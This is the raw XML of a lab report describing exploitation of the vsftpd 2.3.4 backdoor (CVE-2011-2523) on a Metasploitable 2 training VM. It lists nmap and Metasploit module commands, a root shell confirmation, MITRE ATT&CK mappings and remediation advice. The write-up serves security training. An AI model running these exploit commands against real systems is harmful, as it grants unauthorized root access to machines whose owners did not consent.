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Lab 02: Metasploitable vsftpd 2.3.4 Backdoor Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lab Status: ✅ COMPLETE | Date: 2026-07-09 | Attack Duration: &lt;5 seconds | Outcome: Root shell obtained</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Objective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploit a known backdoor vulnerability in vsftpd (Very Secure FTP Daemon) version 2.3.4 running on Metasploitable 2 to gain remote code execution with root privileges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">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Attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Kali Linux VM (10.0.2.15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Metasploitable 2 VM (10.0.2.4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Vulnerable Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">vsftpd 2.3.4 (FTP) on port 21/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Exploitation Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Metasploit Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attack Steps - Phase 1: Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Service Discovery with Nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Command: nmap -sV 10.0.2.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Evidence Screenshot - Nmap Service Discovery:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5238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Finding: vsftpd 2.3.4 identified on port 21/tcp — this version has a publicly documented backdoor (CVE-2011-2523).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attack Steps - Phase 2: Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Launch Metasploit and configure exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Commands:
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.0.2.4
run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Evidence Screenshot - Metasploit Configuration and Execution:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="52387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/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attack Steps - Phase 3: Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Confirm root access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Command: whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Response: root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Result: Successfully obtained root-level shell access (UID 0) with no credentials required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MITRE ATT&amp;CK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Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Exploit Public-Facing Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">T1190</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Command and Scripting Interpreter (Unix Shell)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">T1059.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• Update vsftpd to version 2.3.5 or later immediately</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• Disable FTP and transition to SFTP (SSH-based file transfer)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• Monitor for suspicious port 6200 connections (backdoor indicator)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• Implement network segmentation to restrict FTP access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This lab successfully exploited CVE-2011-2523 in vsftpd 2.3.4 to gain unauthenticated root access. The vulnerability demonstrates the critical importance of timely patching for public-facing services and the dangers of supply-chain backdoors in widely-used open-source software.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be24fd7e86b2aea3ffb687b05891f9d9de88d1.undefined"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/f81608fa4465ce5c7db76dac657beba4489efce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2026-07-10T13:43:09.953Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-10T13:43:09.970Z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